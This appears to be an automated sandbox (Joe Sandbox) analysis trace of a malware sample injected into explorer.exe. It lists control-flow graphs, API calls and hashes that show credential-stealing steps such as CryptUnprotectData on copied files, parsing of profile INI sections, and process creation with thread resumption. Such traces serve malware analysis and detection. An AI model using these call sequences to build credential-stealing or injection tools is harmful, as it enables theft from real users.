                                                                                                                          control_flow_graph 325 2492cd0-2492cfe call 24932ec 328 2492f92-2492fa2 325->328 329 2492d04-2492d0f 325->329 329->328 330 2492d15-2492d17 329->330 331 2492f7d-2492f8d call 24952cc 330->331 332 2492d1d-2492d26 330->332 331->328 332->331 333 2492d2c-2492d33 332->333 333->331 335 2492d39-2492d6f call 2494d8c 333->335 335->331 340 2492d75-2492d94 call 2494518 335->340 343 2492d9a-2492d9b 340->343 344 2492f67-2492f78 call 24952cc * 2 340->344 345 2492d9d-2492dbf 343->345 344->331 350 2492f55-2492f60 345->350 351 2492dc5-2492de0 call 2494fc8 345->351 350->344 351->350 354 2492de6-2492dea 351->354 354->350 355 2492df0-2492e02 354->355 356 2492e0c-2492e31 call 2494578 355->356 357 2492e04-2492e06 355->357 361 2492f29-2492f2f call 24952cc 356->361 362 2492e37-2492ee9 call 2495328 call 2492fac 356->362 357->356 358 2492f34-2492f4f SleepEx 357->358 358->345 358->350 361->358 373 2492eeb-2492ef3 362->373 374 2492efa-2492f0a ResumeThread call 24952cc 362->374 373->374 376 2492f0f-2492f22 374->376 376->361
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 024932EC: CreateFileW.KERNEL32 ref: 02493332
                                                                                                                            • Part of subcall function 024932EC: ReadFile.KERNEL32 ref: 02493379
                                                                                                                          • ResumeThread.KERNEL32 ref: 02492EFE
                                                                                                                          • SleepEx.KERNEL32 ref: 02492F43
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateReadResumeSleepThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3143597149-0
                                                                                                                          • Opcode ID: f5820b8ea5cff059e2ca65d3897565f173a588097ec6688a9389ae85ed4efe19
                                                                                                                          • Instruction ID: 1150fd9393647a021d9f28693d0b21df878c6cffa5e57c41f0e78fc481c450ee
                                                                                                                          • Opcode Fuzzy Hash: f5820b8ea5cff059e2ca65d3897565f173a588097ec6688a9389ae85ed4efe19
                                                                                                                          • Instruction Fuzzy Hash: 8071AA30308F499FDB69EB28C4587BAB7E2FB98311F54452ED49EC3245DF74A8428B81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 379 24932ec-249333f CreateFileW 380 2493341-2493351 379->380 381 24933b5-24933b8 379->381 388 24933ac-24933ad 380->388 389 2493353-2493387 call 2495328 ReadFile 380->389 382 24933ba-24933bd 381->382 383 2493420-2493421 381->383 382->383 385 24933bf-24933e1 call 2495328 call 2494f1c 382->385 384 2493423-249343c 383->384 396 24933e3-2493406 385->396 388->381 395 249338f-24933a3 call 2494fc8 389->395 395->388 401 24933a5-24933a6 395->401 400 2493408-249341e call 24952cc * 2 396->400 400->384 401->388
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3388366904-0
                                                                                                                          • Opcode ID: badfb69e866206bf1aec5894b37ec2a863fdc2aed447bd11c369af276a4e727e
                                                                                                                          • Instruction ID: fd81e775cc501d881f905adc39788e190a2a531b00f18688082bcf6f0342d500
                                                                                                                          • Opcode Fuzzy Hash: badfb69e866206bf1aec5894b37ec2a863fdc2aed447bd11c369af276a4e727e
                                                                                                                          • Instruction Fuzzy Hash: BA41A23071CF0D4FDB68EB6C985937ABAD2EBC9311F50026EA49BC3245DE64981347C1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 406 2494e00-2494e49 call 2494f1c 410 2494e4f 406->410 411 2494ed3-2494f02 call 24952cc ObtainUserAgentString 406->411 412 2494e51-2494e93 call 2494f1c RegQueryValueExA 410->412 417 2494f03 call 24952cc 412->417 418 2494e95-2494eb4 call 24952cc call 24950dc 412->418 421 2494f08-2494f0d 417->421 418->421 427 2494eb6-2494ec7 418->427 423 2494ec9-2494eca 421->423 424 2494f0f 421->424 423->411 424->412 427->423
                                                                                                                          APIs
                                                                                                                          • RegQueryValueExA.KERNEL32 ref: 02494E85
                                                                                                                          • ObtainUserAgentString.URLMON ref: 02494EEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AgentObtainQueryStringUserValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4107646653-0
                                                                                                                          • Opcode ID: 14967515942ab5f3155c187ddb7612eac1b6b4b83ea38ca3825b558acf83a191
                                                                                                                          • Instruction ID: 603efe40e92efe36c9f2f8fbbea3a292510d00103847d6d85e947c56fb0d1322
                                                                                                                          • Opcode Fuzzy Hash: 14967515942ab5f3155c187ddb7612eac1b6b4b83ea38ca3825b558acf83a191
                                                                                                                          • Instruction Fuzzy Hash: 84318831608A4D8FDF18EF68D8896EA77E6FB98310B10027FD85AD7545EF7098064B91

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetTokenInformation.KERNELBASE ref: 02494A94
                                                                                                                          • GetTokenInformation.KERNELBASE ref: 02494ACB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InformationToken
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4114910276-0
                                                                                                                          • Opcode ID: c16b9007777c5fbaa3f53cde1809afd9184394dfa0c7ae21d454d4480f8148c1
                                                                                                                          • Instruction ID: d63d56107e1d0035397da8d0950bd2d3fe9d0f64c5c23c5be9b0964ed180c559
                                                                                                                          • Opcode Fuzzy Hash: c16b9007777c5fbaa3f53cde1809afd9184394dfa0c7ae21d454d4480f8148c1
                                                                                                                          • Instruction Fuzzy Hash: 59213334608B088FCB55EB28D45866AB7F2FB99311B100A6EE49AC7254CB70D845DB41

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 443 2493cd0-2493ce0 444 2493ce2-2493d04 EnumWindows SleepEx 443->444 445 2493d06-2493d14 443->445 444->444 444->445
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumSleepWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 498413330-0
                                                                                                                          • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                          • Instruction ID: 9c3a15409762cb6d09fed670cb0f1b7e8e8a8beda86e21655df383f0780660f2
                                                                                                                          • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                          • Instruction Fuzzy Hash: 80E04F30504A098FEF28AFA4C0DCBB13AA1EB18206F1401BBDC0EDD285CB764985C720

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 446 2493f7c-2493fbd 447 2493fbf-2493fc1 446->447 448 2493fc6-249400c call 2495328 call 2495274 call 2494434 446->448 449 249439c-24943b7 447->449 456 249401a-2494020 448->456 457 249400e-2494018 448->457 458 2494022-2494030 456->458 457->458 460 249438e-2494394 call 24952cc 458->460 461 2494036-249406d 458->461 463 2494399-249439a 460->463 466 2494383-2494384 461->466 467 2494073-249409e 461->467 463->449 466->460 467->466 469 24940a4-24940b9 467->469 470 24940bb-24940bd 469->470 471 249410f-2494114 469->471 472 24940bf-24940db call 2494f1c 470->472 473 2494117-2494150 470->473 471->473 479 24940f9-249410d call 2494f1c 472->479 480 24940dd-24940f4 call 2494fc8 472->480 477 2494350-249435d 473->477 478 2494156-249415c 473->478 492 249436a-249436d 477->492 493 249435f-2494365 call 24952cc 477->493 481 249417e-2494188 478->481 482 249415e-249417b 478->482 479->473 480->479 485 249418e-2494199 481->485 486 2494233-2494259 481->486 482->481 490 249419b 485->490 491 24941a0-249422b call 2494f1c call 2495328 call 2495384 call 2494f1c call 24943c0 call 24952cc * 3 485->491 501 249425f-2494270 486->501 502 2494332-2494343 486->502 490->491 491->486 496 249437a-2494380 492->496 497 249436f-2494375 call 24952cc 492->497 493->492 496->466 497->496 501->502 507 2494276-24942a1 501->507 502->477 508 2494345-249434b call 24952cc 502->508 514 24942a3-24942ad 507->514 508->477 517 24942cd-24942eb 514->517 518 24942af-24942cb RtlReAllocateHeap 514->518 522 24942ed 517->522 523 24942ef-24942f4 517->523 518->517 522->523 523->514 525 24942f6-2494301 523->525 527 2494303-2494309 call 2495368 525->527 528 2494322-249432a 525->528 532 249430e-2494318 527->532 528->502 532->528
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 03da1ff889cf56ce5b15326bb5d87766f4294a11689bde974b35e737c0aadbcd
                                                                                                                          • Instruction ID: 423de9c1e0e2f4227af6302274467304bafdac79fba3a1148885ef276c8cd19e
                                                                                                                          • Opcode Fuzzy Hash: 03da1ff889cf56ce5b15326bb5d87766f4294a11689bde974b35e737c0aadbcd
                                                                                                                          • Instruction Fuzzy Hash: 3BD16E30718B498FDF64EF68D4457AEBBE2FB98701F50452EE44AD3241DB74E8068B82
                                                                                                                          APIs
                                                                                                                          • CreateProcessInternalW.KERNEL32 ref: 0249465C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2186235152-0
                                                                                                                          • Opcode ID: c6ea0675358742ce16f6cf21072778e4d3517b6488bd88ff55d4cd9cd9108430
                                                                                                                          • Instruction ID: 295bd8dbdd66fe09d45b6671c89198a537c42a5ba2f09573f35d1b40703a6bd0
                                                                                                                          • Opcode Fuzzy Hash: c6ea0675358742ce16f6cf21072778e4d3517b6488bd88ff55d4cd9cd9108430
                                                                                                                          • Instruction Fuzzy Hash: 24318B30708F484FCB98EF69D08875AB7E2FB98311F504A6EA44EC3245DBB4D8458B81
                                                                                                                          APIs
                                                                                                                          • GetVolumeInformationA.KERNEL32 ref: 02494CFD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: InformationVolume
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2039140958-0
                                                                                                                          • Opcode ID: 1d0cb5fe9283983f3568e12a9bb75b7ec9ed7c5609916c5b8e7118791da650f8
                                                                                                                          • Instruction ID: 5554e77322385130ba7823b7815904103b13579e57d507e35e8d82d1951b779d
                                                                                                                          • Opcode Fuzzy Hash: 1d0cb5fe9283983f3568e12a9bb75b7ec9ed7c5609916c5b8e7118791da650f8
                                                                                                                          • Instruction Fuzzy Hash: AB315330618B4C8FDB64EF68D448BAA77E2FBA8311F50466E984ED7264DE30D9458B81
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 024919D0: RtlCreateHeap.NTDLL ref: 02491AE7
                                                                                                                          • SleepEx.KERNEL32(?,?,?,?,?,?,?,02491973), ref: 024919A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_2491000_explorer.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateHeapSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 221814145-0
                                                                                                                          • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                          • Instruction ID: 33061fb596b47a362798086dfc61bdc85f96bc5c8a8fc9cee5d22764fbfaf237
                                                                                                                          • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                          • Instruction Fuzzy Hash: E2E0DF30718A0A0FDF98BB7A848433D28A2DBC8200F40057FA91EC6281D928C880C722
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 82f62c227411d470cf7fc4343b5d1ab3019f26e6e6a1bfcf7a6ebd3d0ec822f2
                                                                                                                          • Instruction ID: e592e3248c43000d91a3919136793c78b274063c58afe94bdc517a89d3a73359
                                                                                                                          • Opcode Fuzzy Hash: 82f62c227411d470cf7fc4343b5d1ab3019f26e6e6a1bfcf7a6ebd3d0ec822f2
                                                                                                                          • Instruction Fuzzy Hash: F421D331E012049FDB28AFB9D84859DBBB6FF88310B55453AE90297360DF7088858B90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: cb88300abded116151409b17e288f15f7cdee4f34011604b591c4dbb24ac0c70
                                                                                                                          • Instruction ID: 34a60145ddce6a627a42d4b6237bc63c3822a5ee70483a2a26aeb6fbfd112e97
                                                                                                                          • Opcode Fuzzy Hash: cb88300abded116151409b17e288f15f7cdee4f34011604b591c4dbb24ac0c70
                                                                                                                          • Instruction Fuzzy Hash: A061C435B002148FDB24AFB9D85876DBBAAFFC8711F558429E906D7364DF749C828B80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f06b3da9fbda1f405dafbb5ff7a4d4b8195d52df9b7127d64613544b921b7748
                                                                                                                          • Instruction ID: 696f132a7b0293231fc6a8f68e182c9766582d136237b7e9af227b775993e38e
                                                                                                                          • Opcode Fuzzy Hash: f06b3da9fbda1f405dafbb5ff7a4d4b8195d52df9b7127d64613544b921b7748
                                                                                                                          • Instruction Fuzzy Hash: F23119753812148FCB59AB78C45891D7BE2BF8A71636204B9E506CF371DB35DC82CB80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8609cc05a24ecc8661923be5a03c2016da4cadaf7f3bca8c178b5935e52cf8dc
                                                                                                                          • Instruction ID: b8095118bf255e5c8f695e176287b52a534c339a4223204bf7e25b60de95b861
                                                                                                                          • Opcode Fuzzy Hash: 8609cc05a24ecc8661923be5a03c2016da4cadaf7f3bca8c178b5935e52cf8dc
                                                                                                                          • Instruction Fuzzy Hash: 64012C34B012148FDF286FB9981C66C7BA6FBC8321B554439E916C7365DFB58C818B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f129647139c3dda376decafd002495320337a1ebb5ffb35622db4869c257910d
                                                                                                                          • Instruction ID: c00c08c3b018e5d249760ef5edf4a5fedf4740e8c5a19a97c925eaa01bde849d
                                                                                                                          • Opcode Fuzzy Hash: f129647139c3dda376decafd002495320337a1ebb5ffb35622db4869c257910d
                                                                                                                          • Instruction Fuzzy Hash: DAF0A4716402119FCB24AF34F41C65D3BA5F788731B5E4060E40A8B364DFB81CC28785
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 671d1b34844d6749a68317330f991155e6d75521860456b964cfb50101687e6e
                                                                                                                          • Instruction ID: e3bbb89d4b9231724181ddf9a3647889fec34ef364903d72b06f914961f09f4a
                                                                                                                          • Opcode Fuzzy Hash: 671d1b34844d6749a68317330f991155e6d75521860456b964cfb50101687e6e
                                                                                                                          • Instruction Fuzzy Hash: 3EF0E2306042548FC702DBB9F454A697BF4FB8E210B4082AAD44ACB372CBB49C818F41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 40778640159993c24d4a5bd2da15f7fb978601288cdbcaa17b400300b0627e0d
                                                                                                                          • Instruction ID: 40cfa4c62492d0bba14030b4e85007e67b8f7cc42bb004688e4912e389566823
                                                                                                                          • Opcode Fuzzy Hash: 40778640159993c24d4a5bd2da15f7fb978601288cdbcaa17b400300b0627e0d
                                                                                                                          • Instruction Fuzzy Hash: D7E09A306002188FC705EBAEF414B1977E9FB8D260B8081A8E519CB372DBB4ECC08F91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f6347d2db5e837bdbc8226ae480d208222a5556f394934a93ff19db16658f228
                                                                                                                          • Instruction ID: ba5c904f0aa3c015a40ff4489e03f27b37a8c550ce2a321faf77770acbccde52
                                                                                                                          • Opcode Fuzzy Hash: f6347d2db5e837bdbc8226ae480d208222a5556f394934a93ff19db16658f228
                                                                                                                          • Instruction Fuzzy Hash: D7D05E352483448FC722CF24E9189223BB8FB09315344008AED09CB372D6B5EC84CB12

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:3.4%
                                                                                                                          Dynamic/Decrypted Code Coverage:50.7%
                                                                                                                          Signature Coverage:21.5%
                                                                                                                          Total number of Nodes:785
                                                                                                                          Total number of Limit Nodes:79
                                                                                                                          execution_graph 29729 2986698 30 API calls 29730 299069d _allmul 29843 29b2c9e 116 API calls 29734 297629a 23 API calls 29436 2973098 29437 2971b6a 2 API calls 29436->29437 29440 29730af 29437->29440 29438 29733a9 29440->29438 29460 2971000 GetProcessHeap RtlAllocateHeap 29440->29460 29441 29730ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 29442 29c4bec 89 API calls 29441->29442 29445 2973126 29442->29445 29443 297339b DeleteFileW 29444 2971011 3 API calls 29443->29444 29444->29438 29445->29443 29446 2973392 29445->29446 29461 29902ec 107 API calls 29445->29461 29448 29c3848 76 API calls 29446->29448 29448->29443 29449 2973381 29464 298fb92 93 API calls 29449->29464 29451 29732cd CryptUnprotectData 29458 2973155 29451->29458 29452 297319c RtlCompareMemory 29452->29451 29452->29458 29454 29731d0 RtlZeroMemory 29462 2971000 GetProcessHeap RtlAllocateHeap 29454->29462 29456 2971fa7 19 API calls 29456->29458 29457 2971011 3 API calls 29457->29458 29458->29449 29458->29451 29458->29452 29458->29454 29458->29456 29458->29457 29459 2971798 lstrlen 29458->29459 29463 29902ec 107 API calls 29458->29463 29459->29458 29460->29441 29461->29458 29462->29458 29463->29458 29464->29446 29846 29b348f 27 API calls 29737 2980284 39 API calls 29851 29878b9 33 API calls 29585 2972cb5 29586 2972cbe 29585->29586 29587 2971953 6 API calls 29586->29587 29588 2972cc3 29587->29588 29589 2972e17 29588->29589 29590 2971953 6 API calls 29588->29590 29591 2972cd9 29590->29591 29614 2971000 GetProcessHeap RtlAllocateHeap 29591->29614 29593 2972ce9 29615 2971000 GetProcessHeap RtlAllocateHeap 29593->29615 29595 2972cf9 29596 2971b6a 2 API calls 29595->29596 29597 2972d04 29596->29597 29598 2972d0c GetPrivateProfileSectionNamesW 29597->29598 29599 2972ded 29597->29599 29598->29599 29601 2972d22 29598->29601 29600 2971011 3 API calls 29599->29600 29602 2972e02 29600->29602 29601->29599 29604 2972d3f StrStrIW 29601->29604 29606 2972dd7 lstrlenW 29601->29606 29612 2971953 6 API calls 29601->29612 29613 2971011 3 API calls 29601->29613 29603 2971011 3 API calls 29602->29603 29605 2972e09 29603->29605 29604->29606 29607 2972d53 GetPrivateProfileStringW 29604->29607 29608 2971011 3 API calls 29605->29608 29606->29599 29606->29601 29607->29606 29609 2972d72 GetPrivateProfileIntW 29607->29609 29610 2972e10 29608->29610 29609->29601 29611 2971011 3 API calls 29610->29611 29611->29589 29612->29601 29613->29601 29614->29593 29615->29595 29740 29912bb _allmul _allmul _allmul _alldvrm _allmul 29852 29748b1 22 API calls 29853 2976eb7 24 API calls 29743 29796bc _alldiv _alldiv _alldiv _alldiv _allmul 29696 2979ea7 RtlAllocateHeap 29697 2979ed9 29696->29697 29698 2979ec1 29696->29698 29700 2977f70 17 API calls 29698->29700 29700->29697 29701 2972ea5 25 API calls 29854 298b0aa 84 API calls 29702 29724a4 29705 2972198 RtlZeroMemory GetVersionExW 29702->29705 29706 29721cb LoadLibraryW 29705->29706 29708 29721fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29706->29708 29709 297249b 29706->29709 29710 2972492 FreeLibrary 29708->29710 29717 2972244 29708->29717 29710->29709 29711 297247b 29711->29710 29712 2972365 RtlCompareMemory 29712->29717 29713 29722e1 RtlCompareMemory 29713->29717 29714 2971953 6 API calls 29714->29717 29715 2971011 GetProcessHeap RtlFreeHeap VirtualQuery 29715->29717 29716 29723f8 StrStrIW 29716->29717 29717->29710 29717->29711 29717->29712 29717->29713 29717->29714 29717->29715 29717->29716 29718 29717c0 9 API calls 29717->29718 29718->29717 29745 29756a2 _allrem 29855 298b8a6 90 API calls 29748 299c6da 23 API calls 29856 29a70de 24 API calls 29861 2975cc5 22 API calls 29862 2985cca 32 API calls 29752 299faca _allmul strcspn 29863 29c34ca 57 API calls 29866 2976eb7 22 API calls 29756 29913ca 103 API calls 29867 2974cf5 memset 29758 29a9ef6 125 API calls 29868 29913ca 103 API calls 29655 29728f8 29656 2972900 29655->29656 29657 2972ac8 29655->29657 29687 2971000 GetProcessHeap RtlAllocateHeap 29656->29687 29659 29c3848 76 API calls 29657->29659 29660 2972ad1 DeleteFileW 29659->29660 29662 2971011 3 API calls 29660->29662 29661 297290e 29688 29902ec 107 API calls 29661->29688 29664 2972adf 29662->29664 29665 2972a8b 29692 298fb92 93 API calls 29665->29692 29667 2972a98 lstrlen 29668 2972aa4 29667->29668 29669 2972ac1 29667->29669 29693 2971798 lstrlen 29668->29693 29671 2971011 3 API calls 29669->29671 29671->29657 29672 2971fa7 19 API calls 29680 2972919 29672->29680 29673 2972ab1 29694 2971798 lstrlen 29673->29694 29675 2972ab9 29695 2971798 lstrlen 29675->29695 29677 29729da lstrlen 29678 29729eb lstrlen 29677->29678 29677->29680 29678->29680 29680->29665 29680->29672 29680->29677 29689 2971000 GetProcessHeap RtlAllocateHeap 29680->29689 29690 2972112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 29680->29690 29691 29902ec 107 API calls 29680->29691 29683 2972a25 wsprintfA lstrlen 29684 2972a6a lstrcat 29683->29684 29685 2972a58 29683->29685 29686 2971011 3 API calls 29684->29686 29685->29684 29686->29680 29687->29661 29688->29680 29689->29680 29690->29683 29691->29680 29692->29667 29693->29673 29694->29675 29695->29669 29870 297f4ec 20 API calls 29722 2979ee8 29723 2979ef1 RtlFreeHeap 29722->29723 29724 2979f1a 29722->29724 29723->29724 29725 2979f02 29723->29725 29727 2977f70 17 API calls 29725->29727 29727->29724 29759 299f21c 23 API calls 29872 297581f _alldiv _allrem _allmul 29465 2974406 29470 2972e30 StrStrIW 29465->29470 29468 2972e30 22 API calls 29469 297443a 29468->29469 29471 2972e57 29470->29471 29472 2972ebc 29470->29472 29474 29719e5 9 API calls 29471->29474 29496 2971000 GetProcessHeap RtlAllocateHeap 29472->29496 29475 2972e68 29474->29475 29475->29472 29497 2971bc5 10 API calls 29475->29497 29476 2972ed0 RegOpenKeyExW 29477 2972f68 29476->29477 29488 2972eee 29476->29488 29480 2971011 3 API calls 29477->29480 29479 2972f50 RegEnumKeyExW 29482 2972f5e RegCloseKey 29479->29482 29479->29488 29483 2972f6f 29480->29483 29481 2972e75 29484 2972eb5 29481->29484 29487 2971afe 10 API calls 29481->29487 29482->29477 29483->29468 29486 2971011 3 API calls 29484->29486 29485 2971953 6 API calls 29485->29488 29486->29472 29489 2972e83 29487->29489 29488->29479 29488->29485 29490 297199d 9 API calls 29488->29490 29493 2972e30 18 API calls 29488->29493 29495 2971011 3 API calls 29488->29495 29492 297199d 9 API calls 29489->29492 29494 2972e91 29489->29494 29490->29488 29491 2971011 3 API calls 29491->29484 29492->29494 29493->29488 29494->29491 29495->29488 29496->29476 29497->29481 29762 2990e0c 22 API calls 29763 297ca01 _allmul _alldiv _allmul _alldiv 29552 297a40e 29554 297a426 29552->29554 29562 297a4a2 29552->29562 29553 297a4cc ReadFile 29557 297a524 29553->29557 29553->29562 29555 297a469 memcpy 29554->29555 29556 297a44a memcpy 29554->29556 29554->29562 29555->29562 29558 297a45d 29556->29558 29566 297a2aa 17 API calls 29557->29566 29560 297a532 29560->29558 29561 297a53e memset 29560->29561 29561->29558 29562->29553 29562->29557 29563 297a501 29562->29563 29565 297a1c6 18 API calls 29563->29565 29565->29558 29566->29560 29877 29a9000 28 API calls 29878 29b5401 memset memcpy memcpy memset memcpy 29616 297f433 29617 297f445 29616->29617 29622 29823b9 29617->29622 29620 297f47c 29621 297f490 29620->29621 29630 297e206 58 API calls 29620->29630 29624 29823d3 29622->29624 29627 2982473 29622->29627 29623 2982431 29623->29627 29631 29763f7 29623->29631 29624->29623 29634 2983451 43 API calls 29624->29634 29627->29620 29628 298240f 29628->29623 29635 298235a 17 API calls 29628->29635 29630->29621 29633 297bafc 20 API calls 29631->29633 29632 2976400 29632->29627 29633->29632 29634->29628 29635->29623 29883 298943d 34 API calls 29886 2997c28 8 